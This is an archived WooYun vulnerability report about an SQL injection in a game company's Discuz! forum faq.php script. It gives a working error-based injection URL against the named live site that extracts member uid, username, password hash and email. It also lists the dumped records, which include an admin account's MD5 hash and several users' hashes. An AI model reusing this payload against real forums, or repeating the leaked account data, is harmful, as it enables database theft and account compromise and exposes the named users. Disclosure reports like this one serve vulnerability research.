当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-068616

漏洞标题:极光互动某分站存在SQL注射

相关厂商:极光互动

漏洞作者: 路人甲

提交时间:2014-07-15 16:47

修复时间:2014-08-29 16:48

公开时间:2014-08-29 16:48

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-07-15: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-08-29: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

存在SQL注入

详细说明:

极光世界的论坛,国产游戏不给力啊,你们这么打造游戏,不要走客户端,要走网页游戏的路子,赚的快,投入少,客户端哪里好占领市场。会员才50万不到。。
http://bbs.aiaigame.com/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)
返回
Discuz! info: MySQL Query Error
Time: 2014-7-15 4:30pm
Script: /faq.php
SQL: SELECT * FROM [Table]usergroups u LEFT JOIN [Table]admingroups a ON u.groupid=a.admingid WHERE u.groupid IN ('7','\',')')
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')' at line 1
Errno.: 1064

漏洞证明:

http://bbs.aiaigame.com/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select concat(0x7b,0x23,uid,0x2c,username,0x2c,password,0x2c,email,0x23,0x7D) from cdb_members limit 0,1 ),0x3a)x from information_schema.tables group by x)a)%23
返回
Discuz! info: MySQL Query Error
Time: 2014-7-15 4:30pm
Script: /faq.php
SQL: SELECT * FROM [Table]usergroups u LEFT JOIN [Table]admingroups a ON u.groupid=a.admingid WHERE u.groupid IN ('7','\',') and (select 1 from (select count(*),concat(floor(rand(0)*2),0x3a,(select concat(0x7b,0x23,uid,0x2c,username,0x2c,password,0x2c,email,0x23,0x7D) from [Table]members limit 0,1 ),0x3a)x from information_schema.tables group by x)a)#')
Error: Duplicate entry '1:{#1,鏋佸厜,1b8f625b18035185d1a456ab7afc2395,he.zhang@auroragam' for key 'group_key'
Errno.: 1062
跑出了15个会员,就没跑了
会员总数量:54590
1,admin,d7b1e6e07ee4fa8e73204253863d41ed,[email protected]
2,elsu,1d768746c4956c017f777ee068ff5231,[email protected]
4,信访室管理员,9d5371bb30cd684bc17082ec6dedf628,[email protected]
5,ljwx,b5d3dae6be6ef049cb5fa708c8e6457f,[email protected]
6,wen-0759,5bbaa7cce657f9c144c46ffd85bbc5b4,[email protected]
7,kkk,9015e1f6b505831ed5f8907b520d3afa,[email protected]
13,cyp,48c5332c32ecfe0e9535b1131aa9e4ee,[email protected]
15,卢森,70811c3da7f8f4c2d10a7a60e3f8434b,[email protected]

修复方案:

升级吧。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝